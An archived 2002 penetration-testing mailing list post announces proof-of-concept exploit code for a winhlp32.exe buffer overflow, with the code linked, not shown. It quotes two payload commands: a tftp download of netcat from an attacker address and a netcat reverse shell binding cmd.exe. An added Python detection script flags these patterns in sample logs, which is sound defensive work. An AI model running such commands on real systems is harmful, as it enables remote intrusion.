Penetration Testing mailing list archives

winhlp32.exe buffer overflow exploit code.
From: "Gary O'leary-Steele" <garyo () sec-1 com>
Date: Mon, 12 Aug 2002 16:22:10 +0100

Hello all,

For some reason my previous posts did not make it onto SecurityFocus ?-)

The following is a link to proof-of-concept code / exploit code for this
overflow. The shellcode is relatively small but effective if used
correctly. The Perl script takes a command to execute (WinExec, SW_HIDE) and
an HTML output file. There are two versions included in the zip.


HelpMe.pl       // Was written to work with my machine's Kernel32.dll version 5.0.2195.4272 (rare?)

HelpMe2.pl      // Was written to work with all other machines I tested, kernel32.dll version 5.0.2195.2778

I have tested the exploit using two html emails.

email 1         Executes tftp.exe -i my.ip.address get nc.exe

email 2         Executes nc.exe my.ip.address 80 -e cmd.exe

If the exploit executes correctly, ExitProcess() is called so no error occurs.

Kind regards,
Gary O'leary-Steele
XScan Team
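The two test payloads in the post (a tftp binary-mode download of nc.exe, then nc.exe with -e cmd.exe) are a classic post-exploitation pattern that shows up clearly in process-creation telemetry. The following is an added detection example, not code from the post or from the XScan team: it parses a constructed, hypothetical "parent -> child: command line" log format and flags the tftp-get, netcat -e, and "help viewer spawns a child" patterns. The log lines and the addresses in them are made up for the example.

```python
import re

# Constructed sample process-creation log lines (hypothetical format, not
# from the original post): "<parent image> -> <child image>: <command line>".
SAMPLE_LOG = [
    "winhlp32.exe -> tftp.exe: tftp.exe -i 203.0.113.5 get nc.exe",
    "winhlp32.exe -> nc.exe: nc.exe 203.0.113.5 80 -e cmd.exe",
    "explorer.exe -> notepad.exe: notepad.exe readme.txt",
    "cmd.exe -> tftp.exe: tftp.exe 192.0.2.10 put report.txt",
]

LINE_RE = re.compile(r"^(?P<parent>\S+) -> (?P<child>\S+): (?P<cmdline>.+)$")

# Netcat-style binaries that accept "-e <program>" to attach a shell to a socket.
NETCAT_NAMES = {"nc.exe", "netcat.exe", "ncat.exe"}


def parse_line(line):
    """Split one log line into parent, child and command line (None if malformed)."""
    m = LINE_RE.match(line)
    return m.groupdict() if m else None


def classify(event):
    """Return the list of reasons an event looks like the tftp/netcat chain (empty if benign)."""
    reasons = []
    args = [a.lower() for a in event["cmdline"].split()]
    # Strip any directory prefix so "C:\Windows\System32\tftp.exe" matches "tftp.exe".
    exe = args[0].rsplit("\\", 1)[-1] if args else ""

    # tftp.exe -i <host> get <file>: binary-mode download of a tool onto the host.
    if exe == "tftp.exe" and "-i" in args and "get" in args:
        reasons.append("tftp binary-mode download (-i ... get)")

    # nc.exe <host> <port> -e cmd.exe: a shell bound to a network connection.
    if exe in NETCAT_NAMES and "-e" in args:
        idx = args.index("-e")
        target = args[idx + 1] if idx + 1 < len(args) else "?"
        reasons.append(f"netcat with -e {target} (shell attached to a socket)")

    # winhlp32.exe has no business launching other programs; the parent alone is a signal.
    if event["parent"].lower() == "winhlp32.exe" and exe != "winhlp32.exe":
        reasons.append("child process spawned by winhlp32.exe")

    return reasons


def scan(lines):
    """Return (command line, reasons) for every suspicious event in the log."""
    findings = []
    for line in lines:
        event = parse_line(line)
        if event is None:
            continue
        reasons = classify(event)
        if reasons:
            findings.append((event["cmdline"], reasons))
    return findings


if __name__ == "__main__":
    for cmdline, reasons in scan(SAMPLE_LOG):
        print(cmdline)
        for r in reasons:
            print("   -", r)
```

The fourth sample line (a tftp "put" from cmd.exe without -i) is left unflagged on purpose: matching on the tool name alone would be noisy, so the rule keys on the binary-mode download and the -e shell binding, and separately on the unusual parent.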

This list is provided by the SecurityFocus Security Intelligence Alert (SIA)
Service. For more information on SecurityFocus' SIA service which
automatically alerts you to the latest security vulnerabilities please see:
